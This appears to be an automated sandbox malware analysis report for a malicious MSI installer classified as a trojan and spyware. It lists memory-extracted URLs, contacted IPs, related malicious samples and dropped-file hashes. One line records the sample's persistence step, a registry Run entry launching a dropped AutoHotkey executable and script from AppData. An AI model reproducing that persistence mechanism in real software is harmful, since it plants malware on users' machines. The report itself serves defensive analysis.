https://ipinfo.io/missingauth	nMv8.exe, 0000000E.00000003.828575334.0000000003220000.00000004.00000001.sdmp, nMv8.exe, 0000000E.00000003.828666877.00000000032B7000.00000004.00000001.sdmp, nMv8.exe, 0000000E.00000003.828803938.000000000334A000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868541058.0000000005300000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868689010.0000000005397000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868854523.000000000542A000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888592122.00000000053CA000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888334752.00000000052F3000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888411993.0000000005337000.00000004.00000001.sdmp	false		high
https://autohotkey.com	nMv8.exe, nMv8.exe, 00000015.00000000.860090595.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.889151958.00000000004AC000.00000002.00020000.sdmp, Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	false		high
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf	HPDofzXZkq.dll.4.dr	false		high
http://www.movable-type.co.uk/scripts/xxtea.pdf	nMv8.exe	false	Avira URL Cloud: safe	unknown
http://192.168.0.108:80/	msiexec.exe, 00000004.00000000.838356796.0000000000921000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc1321	nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
https://code.google.com/p/ddab-lib/issues/list	nMv8.exe, 0000000E.00000002.837388372.0000000005474000.00000002.00020000.sdmp, nMv8.exe, 00000015.00000002.877825324.0000000005244000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.890994937.0000000004DA4000.00000002.00020000.sdmp	false		high
http://192.168.0.108/#n	msiexec.exe, 00000004.00000000.838305703.00000000008AA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf	nMv8.exe	false		high
http://www.schneier.com/paper-twofish-paper.pdf	nMv8.exe	false		high
http://www.schneier.com/paper-blowfish-fse.htmlS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://192.168.0.108	msiexec.exe	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://192.168.0.108U	msiexec.exe, 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, C003I7GF0S8F920G600203.msi	false	Avira URL Cloud: safe	low
http://www.indyproject.org/	nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc4648S	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://www.ietf.org/rfc/rfc3447.txt	nMv8.exe	false		high
http://www.schneier.com/paper-blowfish-fse.html	nMv8.exe	false		high
http://www.itl.nist.gov/fipspubs/fip180-1.htm	nMv8.exe, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf	nMv8.exe	false		high
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf	nMv8.exe	false		high
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://www.movable-type.co.uk/scripts/xxtea.pdfS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf	nMv8.exe	false		high
http://192.168.0.108/lWr	msiexec.exe, 00000004.00000000.838305703.00000000008AA000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.schneier.com/paper-twofish-paper.pdfS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
https://www.thawte.com/cps0/	C003I7GF0S8F920G600203.msi	false		high
http://tools.ietf.org/html/rfc4648	nMv8.exe	false		high
https://www.thawte.com/repository0W	C003I7GF0S8F920G600203.msi	false		high
http://chart.apis.google.com/chart?chs=%dx%d&cht=qr&chld=%s&chl=%sS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfU	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
http://chart.apis.google.com/chart?chs=%dx%d&cht=qr&chld=%s&chl=%s	nMv8.exe	false		high
https://www.advancedinstaller.com	C003I7GF0S8F920G600203.msi	false		high
http://www.componentace.com	C003I7GF0S8F920G600203.msi	false		high
http://192.168.0.108/	msiexec.exe, 00000004.00000000.833698683.0000000000932000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ipinfo.io/jsonK5	nMv8.exe, 0000000E.00000003.828790618.000000000333C000.00000004.00000001.sdmp, nMv8.exe, 00000015.00000003.868839232.000000000541C000.00000004.00000001.sdmp, nMv8.exe, 00000019.00000003.888569578.00000000053BC000.00000004.00000001.sdmp	false		high
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high
https://autohotkey.comCould	nMv8.exe, 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000015.00000000.860090595.00000000004AC000.00000002.00020000.sdmp, nMv8.exe, 00000019.00000002.889151958.00000000004AC000.00000002.00020000.sdmp, Vk5OSNAZ1qGr0gp2STA6jj7mn.4.dr	false	URL Reputation: safe	unknown
http://www.ietf.org/rfc/rfc3447.txtS	nMv8.exe, 0000000E.00000002.830011501.0000000004E81000.00000020.00020000.sdmp, nMv8.exe, 00000015.00000002.870887907.0000000004C51000.00000020.00020000.sdmp, nMv8.exe, 00000019.00000002.889790291.00000000047B1000.00000020.00020000.sdmp, HPDofzXZkq.dll.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.144.200.165	unknown	United States		16509	AMAZON-02US	false
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

Private

IP
192.168.0.108
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	514686
Start date:	03.11.2021
Start time:	14:42:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	C003I7GF0S8F920G600203.msi
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.spyw.evad.winMSI@15/35@3/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 55% (good quality ratio 49.3%) Quality average: 77.6% Quality standard deviation: 32.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .msi
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 204.79.197.222, 104.208.16.94 Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, blobcollector.events.data.trafficmanager.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/514686/sample/C003I7GF0S8F920G600203.msi

Simulations

Behavior and APIs

Time	Type	Description
14:43:43	API Interceptor	3x Sleep call for process: msiexec.exe modified
14:44:45	API Interceptor	3x Sleep call for process: nMv8.exe modified
14:44:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run YSxeldR cmd.exe /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
14:45:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run YSxeldR cmd.exe /c start C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.ahk
14:45:07	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.117.59.81	Unvth9jEVg.exe	Get hash	malicious	Browse	ipinfo.io/country
	aRS3847t8m.exe	Get hash	malicious	Browse	ipecho.net/plain
	a2uwmCMy25.exe	Get hash	malicious	Browse	myexternalip.com/raw
	00253B902S20LSB8S900.msi	Get hash	malicious	Browse	ipinfo.io/json
	vWNA5H5BTr.exe	Get hash	malicious	Browse	myexternalip.com/raw
	iWT2ZGcs2L.exe	Get hash	malicious	Browse	ipinfo.io/ip
	egmTPFrxC4.exe	Get hash	malicious	Browse	ipinfo.io/ip
	doc2_5.xlsm	Get hash	malicious	Browse	ipecho.net/plain
	CPsCTGtjW2.exe	Get hash	malicious	Browse	myexternalip.com/raw
	SXXA002155547884000ES.msi	Get hash	malicious	Browse	ipinfo.io/json
	1s2X5qQkGz.exe	Get hash	malicious	Browse	myexternalip.com/raw
	kR8No6snIq.exe	Get hash	malicious	Browse	ipinfo.io/ip
	q5oqrkn1Eu.exe	Get hash	malicious	Browse	ipinfo.io/102.129.143.33
	kDSybK0wYy.dll	Get hash	malicious	Browse	myexternalip.com/raw
	G6xLKvY3pG.exe	Get hash	malicious	Browse	ipinfo.io/ip
	BSQ4wRQciB.dll	Get hash	malicious	Browse	ipinfo.io/ip
	IokJ1Ttx1O.dll	Get hash	malicious	Browse	ipinfo.io/ip
	TB7BTGrCzi.dll	Get hash	malicious	Browse	myexternalip.com/raw
	KHP6cmziNb.dll	Get hash	malicious	Browse	ipinfo.io/ip
	5ch8dv7ceO.dll	Get hash	malicious	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ipinfo.io	F57VdnCaUV.exe	Get hash	malicious	Browse	34.117.59.81
	9C650B8EDDF1ADE268DE962E1ED3EC37EB3CA2E4E39F9.exe	Get hash	malicious	Browse	34.117.59.81
	abp8H1CcLF.exe	Get hash	malicious	Browse	34.117.59.81
	Unvth9jEVg.exe	Get hash	malicious	Browse	34.117.59.81
	QvTpmv8EVG.exe	Get hash	malicious	Browse	34.117.59.81
	f30dab44e1b3c177c002b35c5e9a933b79345c378dbf4.exe	Get hash	malicious	Browse	34.117.59.81
	2EF3C48DCC895EA8FD3476F43A87EC6A3A38D648DB26F.exe	Get hash	malicious	Browse	34.117.59.81
	e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exe	Get hash	malicious	Browse	34.117.59.81
	dllhost.exe	Get hash	malicious	Browse	34.117.59.81
	FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exe	Get hash	malicious	Browse	34.117.59.81
	365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe	Get hash	malicious	Browse	34.117.59.81
	tEodoA3rYx.exe	Get hash	malicious	Browse	34.117.59.81
	C6XFWQYY93.exe	Get hash	malicious	Browse	34.117.59.81
	00253B902S20LSB8S900.msi	Get hash	malicious	Browse	34.117.59.81
	Setup.exe	Get hash	malicious	Browse	34.117.59.81
	4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exe	Get hash	malicious	Browse	34.117.59.81
	74BAFD56C1FB3CDEBF0A63DE4FFB6F16DC1D5CEE38E11.exe	Get hash	malicious	Browse	34.117.59.81
	iWT2ZGcs2L.exe	Get hash	malicious	Browse	34.117.59.81
	AeXXqhQNJKur7teIlOrvF329.exe	Get hash	malicious	Browse	34.117.59.81
	LsReqBuu7z.dll	Get hash	malicious	Browse	34.117.59.81

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Tx60OCR2cN	Get hash	malicious	Browse	54.124.163.254
	HdZIgkO5be	Get hash	malicious	Browse	13.209.107.25
	Rvg3MFzKNR	Get hash	malicious	Browse	52.46.199.24
	triage_dropped_file.exe	Get hash	malicious	Browse	54.171.119.91
	B94t90Yyoz	Get hash	malicious	Browse	52.30.200.193
	jeequix__%nIuU(64).cmd	Get hash	malicious	Browse	18.220.165.27
	flvd.exe	Get hash	malicious	Browse	13.225.84.114
	AnyDesk.exe	Get hash	malicious	Browse	52.85.14.24
	F57VdnCaUV.exe	Get hash	malicious	Browse	65.9.71.96
	DELAY NOTICE - WAN HAI 261 S321 - SO 3110.exe	Get hash	malicious	Browse	3.64.163.50
	RFQ21116.exe	Get hash	malicious	Browse	75.2.115.196
	Purchase Inquiry_pdf.ppam	Get hash	malicious	Browse	104.192.141.1
	Order_10112021 40200 p.m..html	Get hash	malicious	Browse	34.209.231.187
	SouaKX7fQj	Get hash	malicious	Browse	18.143.65.122
	fFBHCAeru2.exe	Get hash	malicious	Browse	104.192.141.1
	NEaRhAVeo9	Get hash	malicious	Browse	18.228.247.203
	9C650B8EDDF1ADE268DE962E1ED3EC37EB3CA2E4E39F9.exe	Get hash	malicious	Browse	52.219.62.123
	ApuXjs7iJm	Get hash	malicious	Browse	18.241.124.110
	PqvOhbzWzm	Get hash	malicious	Browse	99.79.220.136
	arm7-20211103-0152	Get hash	malicious	Browse	13.225.38.189
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	triage_dropped_file.exe	Get hash	malicious	Browse	34.117.168.233
	idX4FFBrZC.exe	Get hash	malicious	Browse	34.117.59.81
	charges (2).doc	Get hash	malicious	Browse	34.67.144.4
	F57VdnCaUV.exe	Get hash	malicious	Browse	34.117.59.81
	9C650B8EDDF1ADE268DE962E1ED3EC37EB3CA2E4E39F9.exe	Get hash	malicious	Browse	34.117.59.81
	setup.exe	Get hash	malicious	Browse	34.117.59.81
	sora.arm	Get hash	malicious	Browse	34.66.240.219
	setup_x86_x64_install.exe	Get hash	malicious	Browse	34.117.59.81
	A3845D760F3394981F0E9B2330C279DB0534BEFAAA17C.exe	Get hash	malicious	Browse	34.117.59.81
	powTubeDoor.dll	Get hash	malicious	Browse	34.117.59.81
	DHL_Delivery_Confirmation.exe	Get hash	malicious	Browse	34.117.168.233
	03DF381BD91F5CFC93785D4B9A809CDCF6E13E9023651.exe	Get hash	malicious	Browse	34.117.59.81
	Unvth9jEVg.exe	Get hash	malicious	Browse	34.117.59.81
	setup_x86_x64_install.exe	Get hash	malicious	Browse	34.117.59.81
	lbbXpFFkIN.exe	Get hash	malicious	Browse	34.117.59.81
	Swift Payment Copy.exe	Get hash	malicious	Browse	34.117.168.233
	setup_installer.exe	Get hash	malicious	Browse	34.117.59.81
	setup_x86_x64_install.exe	Get hash	malicious	Browse	34.117.59.81
	Lr564s8C52.exe	Get hash	malicious	Browse	34.117.59.81
	zCc2dA5x3P.exe	Get hash	malicious	Browse	34.117.59.81

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Config.Msi\6296d6.rbs Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	1525
Entropy (8bit):	5.303247271517508
Encrypted:	false
SSDEEP:	24:FggduBXydmGrl26BhmCulA/QxT9E3Ehy+SnAFJwg25dzF7kkzTWp4w4RypY:FgYYiR5RBhEHxonAFJwgqF7vfZRIY
MD5:	66092D621D17E04B653DC6F106EE5BC1
SHA1:	4423D029662356719FEF4C89F10BBF3F94EA0670
SHA-256:	9336D5819A9BCCB947B7DC6DE48140CACCDB7B135D5E63EC6E71C28A477ADBEC
SHA-512:	14FA63A8D95D9F90A6656237E3B2E9BD50B4D67E4FA4DB2F523E168BF8419683F1A8B29D1EFBA462BF7637FF6F4E6E3A8F01B4D888B318B90B096D957BD06653
Malicious:	false
Preview:	...@IXOS.@.....@vucS.@.....@.....@.....@.....@.....@......&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}..Fichero..C003I7GF0S8F920G600203.msi.@.....@.....@.....@........&.{3E67FA5E-8FCD-475D-9775-2AF171CB93BE}.....@.....@.....@.....@.......@.....@.....@.......@......Fichero......Rollback..A.c.c.i...n. .d.e. .r.e.s.t.a.u.r.a.c.i...n.:.....RollbackCleanup..Quitando copias de seguridad..Archivo: [1]....ProcessComponents'.Actualizando el registro de componentes..&.{695B5255-7208-415A-A640-57FD170FF7EB}&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}.@......&.{CC4F17AA-BE4F-4AF8-B3B1-1A89B0A67A2C}&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}.@......&.{15758A0D-A2A6-4A02-827C-1630D80F8A37}&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}.@......&.{EB60B538-7A9E-494E-AEFC-6E5A62962D2F}&.{8E7E373A-E5DB-413B-AEBC-9EEAF6000AEA}.@........CreateFolders..Creando carpetas..Carpeta: [1]"...C:\Users\Public\.@............. .......,................................................... ... ...........................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Windows Installe_fe47654c3ade9bbbfd63cef826485d5aff3db34_a352735a_18b1a645\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0200327990810547
Encrypted:	false
SSDEEP:	192:TRFgklc1Z0TkHY/2Nejed+j8m/u7sHS274It2JZ:X6A4Y/2Ijem/u7sHX4It2
MD5:	D66A5B8ABC4B33DE0780787F9AF9A143
SHA1:	2269CCBF2D713BB1F24446ADBC783D56B5FDD75C
SHA-256:	BDB9B74A04D9D0100733D9FF0C5C7C3052870DCD425DAA7ACA039E3D7B841AA0
SHA-512:	7E452C1898C18DB099142CC299046359B85116D83FB3373A1BD27B51CF5E6C03000B74CB7CABF599893DFBC05D3392C0BF5D5E73E6D1B40C34093060AEF5054F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.W.i.n.d.o.w.s.I.n.s.t.a.l.l.e.r.C.u.s.t.o.m.A.c.t.i.o.n.s.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.0.4.2.0.6.9.7.4.4.4.7.5.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.0.4.2.0.7.0.6.4.9.1.6.7.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.b.e.a.9.b.4.-.f.4.e.2.-.4.f.a.1.-.a.4.1.b.-.5.e.5.c.a.6.0.d.2.6.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.8.f.e.3.3.8.-.4.9.f.d.-.4.7.5.3.-.a.8.5.9.-.8.3.7.9.7.e.d.f.7.c.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.s.i.E.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.5.0.-.0.0.0.1.-.0.0.1.b.-.b.c.c.0.-.d.e.c.f.b.8.d.0.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.3.4.f.8.c.9.5.f.0.8.1.5.9.a.f.5.4.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1178.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.704816679080625
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNigd6o6YP6SUMgmfBSHj+pri89bTcIxsf1Rm:RrlsNiS6o6YCSUMgmfBS8TcIqfK
MD5:	7B873084F6649FF143E22C55610841E0
SHA1:	0CE44D314AAE25526D73FA15CA2E6896617E46D5
SHA-256:	7DD51D1220913B4436E31DC870C097724D2197ED1EC96CA82B551B644742B97A
SHA-512:	1D0CECF77880C634D85676091AC243AE66A920B155C8CD3B18755E2C0B42B5678285E021576CD119F7CFE8134D756D1B85D7089AB529E009DED651FF06529165
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15FD.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4655
Entropy (8bit):	4.525994437362868
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9FhWSC8BcM8fm8M4J1ARhFXj+q8vMrARakhEspd:uITfhKwSNMJuNKHQkhEspd
MD5:	144037C12F824E9949AB10505C3CE2E4
SHA1:	82FD3A32AB4EDB3B714BA0615505D1CC33F128CC
SHA-256:	D01FBE4AC935F5A7ADAAACBF207EB70D7FE973295FC3F53A1E5283D0CB68713D
SHA-512:	720073225028A77E68834EC3BA09CABCAD5A82C1FB97F5CCE621F204E37E3D972A7DB9B8D8DA8AE550E3C69B0F0228DCC11226B1AE6F05FC588F35FB208C56EB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1238335" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E2.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Nov 3 13:44:59 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46988
Entropy (8bit):	2.7686836914082975
Encrypted:	false
SSDEEP:	384:aq75LbHb3BRND5RHhbTZaZyku1Jwr079C:T7VbHb3Bj71TZaAWr05
MD5:	1BA40DD5577EC2C25DC95CFD1216EEAA
SHA1:	59651155C2F6519C14088843ECEA6704F319A5C7
SHA-256:	7B6106AC39C120E04EB96F58ABB4BDF49C6B9EAA6D1C31653DF5D5D061AD3573
SHA-512:	69EF59AB2B5A9FCAE0AFBD9932B06B9D83ED436F5AC0B62CEF72B70BA616B71171071EF243C098239BB4DE584407EC33FA33CFD296ABB8DF503E099657C33D99
Malicious:	false
Preview:	MDMP....... .......[..a............4...........T...H............ ......T....6..........`.......8...........T...........X0..4............#...........%...................................................................U...........B......,&......GenuineIntelW...........T.......P......a.............................0..9...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\u0IjY7UrZ\HPDofzXZkq.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6948352
Entropy (8bit):	6.665068034547817
Encrypted:	false
SSDEEP:	98304:zpoP2U/6BZ7a8h0cfD7FLqycmPOIOj9C:zU2UYhzVq+O/
MD5:	423DD33569CBF1ABB5B3E838F0FB07AA
SHA1:	4F021B3686B7DE1D18482E73267C84A0AF7563EE
SHA-256:	A15EE764618CC1AA648F341C0419B8A1FB933CD9DA404A27F385CE5FF8BA1405
